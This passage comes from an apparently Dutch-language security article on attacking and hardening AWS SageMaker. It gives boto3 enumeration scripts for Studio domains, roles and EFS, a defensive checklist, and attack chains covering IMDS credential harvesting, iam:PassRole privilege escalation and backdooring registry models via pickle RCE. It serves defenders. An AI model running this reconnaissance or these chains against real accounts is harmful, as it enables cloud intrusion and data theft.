                  f"{stmt.get('Principal', {})}")
    except ecr.exceptions.RepositoryPolicyNotFoundException:
        print(f"  No repository policy (default account access only)")

6. Exploitatie van SageMaker Studio-domeinen

import boto3
 
sm = boto3.client('sagemaker')
efs = boto3.client('efs')
 
# Studio-domeinen opsommen
domains = sm.list_domains()['Domains']
for domain in domains:
    detail = sm.describe_domain(DomainId=domain['DomainId'])
    print(f"\nDomain: {detail['DomainName']}")
    print(f"  Auth: {detail['AuthMode']}")
    print(f"  VPC: {detail.get('VpcId', 'No VPC')}")
    print(f"  EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")
 
    # De standaard execution role geldt voor alle gebruikers
    default_settings = detail.get('DefaultUserSettings', {})
    print(f"  Default role: {default_settings.get('ExecutionRole', 'N/A')}")
 
    # Gebruikersprofielen opsommen
    profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
    for profile in profiles['UserProfiles']:
        user_detail = sm.describe_user_profile(
            DomainId=domain['DomainId'],
            UserProfileName=profile['UserProfileName']
        )
        user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
        print(f"  User: {profile['UserProfileName']} "
              f"(role: {user_role or 'uses default'})")
 
    # Controleren of het EFS toegankelijk is
    if 'HomeEfsFileSystemId' in detail:
        efs_id = detail['HomeEfsFileSystemId']
        try:
            fs = efs.describe_file_systems(FileSystemId=efs_id)
            print(f"  EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
            # Mount targets controleren op netwerkblootstelling
            mounts = efs.describe_mount_targets(FileSystemId=efs_id)
            for mt in mounts['MountTargets']:
                print(f"  EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
        except Exception as e:
            print(f"  EFS access error: {e}")

Checklist voor defensieve beoordeling

Controlegebied	Wat te verifiëren	Veelvoorkomende bevinding
IAM-rollen	Execution roles met minimale privileges per component	`AmazonSageMakerFullAccess` gekoppeld aan alle rollen
IMDS	IMDSv2 afgedwongen op notebook-instances	IMDSv1 nog steeds ingeschakeld (standaard op oudere instances)
Netwerk	VPC-isolatie voor notebooks, training en endpoints	Geen VPC-configuratie (standaard)
S3	Bucket-policies, encryptie, versiebeheer, access logging	Publieke of te ruime bucket-policies
ECR	Image-scanning, repository-policies, immutable tags	Geen vulnerability scanning geconfigureerd
Logging	CloudTrail, CloudWatch, logging van SageMaker Experiments	Onvolledige logging van SageMaker API-aanroepen
Encryptie	KMS-sleutels voor S3, EBS, EFS en inter-node training	Standaard door AWS beheerde sleutels (geen controle van de klant)
Endpoint	IAM-autorisatie, VPC-endpoints, resource-policies	Geen IAM-condities op endpoint-aanroep

Aanbevolen hardening

Vervang AmazonSageMakerFullAccess door aangepaste policies die beperkt zijn tot specifieke S3-paden, ECR-repositories en SageMaker-resources.
Dwing IMDSv2 af op alle notebook-instances door MinimumInstanceMetadataServiceVersion op 2 te zetten.
Plaats alle componenten in een VPC met private subnets en VPC-endpoints voor S3, ECR, SageMaker API en SageMaker Runtime.
Schakel S3-bucketversiebeheer en access logging in op alle SageMaker-gerelateerde buckets om ongeoorloofde toegang of wijziging te detecteren.
Gebruik aparte IAM-rollen voor notebooks, trainingsjobs en endpoints, elk beperkt tot alleen de resources die ze nodig hebben.
Schakel ECR-image-scanning in en dwing image-immutability af om supply chain-aanvallen te voorkomen.
Schakel CloudTrail-data-events in voor S3-buckets met trainingsdata en modelartefacten.
Gebruik SageMaker Model Cards en Model Registry om de herkomst van modellen bij te houden en ongeoorloofde modeldeployment te voorkomen.

Veelvoorkomende aanvalsketens

Keten 1: Van notebook tot volledige accountcompromittering

1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)

Keten 2: Vergiftiging van de model registry

1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference request

Keten 3: Cross-account-pivot via een endpoint

1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage endpoint role's cross-account permissions to access resources
   in other AWS accounts within the organization

MITRE ATLAS-mapping voor SageMaker-aanvallen

Aanvalstechniek	ATLAS-ID	SageMaker-specifieke context
IMDS-credentialoogst	AML.TA0002 (Initial Access)	Execution roles van notebooks met brede S3/ECR-toegang
S3-trainingsdatatoegang	AML.T0000 (Search for Victim's Data)	Standaard `sagemaker-*` bucketnaamconventie vergemakkelijkt ontdekking
Endpoint-enumeratie	AML.T0002 (Active Scanning)	`sagemaker:ListEndpoints` onthult alle gedeployde modellen
Modelextractie via endpoint	AML.T0024 (Model Extraction)	Endpoint-aanroep met systematische query's
Manipulatie van ECR-image	AML.T0018 (Backdoor ML Model)	Inferentie-container-image in ECR vervangen
Vergiftiging van trainingsdata	AML.T0020 (Data Poisoning)	S3-trainingsdata wijzigen tussen pipeline-runs

Gerelateerde onderwerpen

Cloud AI-infrastructuur -- Cross-platformoverzicht
API-beveiliging -- Grondbeginselen van endpoint-beveiliging
Model-supply-chain -- Beveiliging van modelartefacten

Referenties

AWS SageMaker Security Documentation - Amazon Web Services (2024) - Official SageMaker security best practices
"Securing Machine Learning Workloads on AWS" - AWS Well-Architected ML Lens (2023) - ML security architecture guidance
CVE-2024-34073 - SageMaker notebook instance IMDS access control bypass
"Cloud Security Alliance AI Safety Initiative" - CSA (2024) - Industry guidance on securing cloud AI platforms

Knowledge Check

Waarom is IMDS-credentialoogst bijzonder gevaarlijk op SageMaker notebook-instances?

Het aanvalsoppervlak van AWS SageMaker

Gerelateerde artikelen

Het aanvalsoppervlak van AWS SageMaker

Gerelateerde artikelen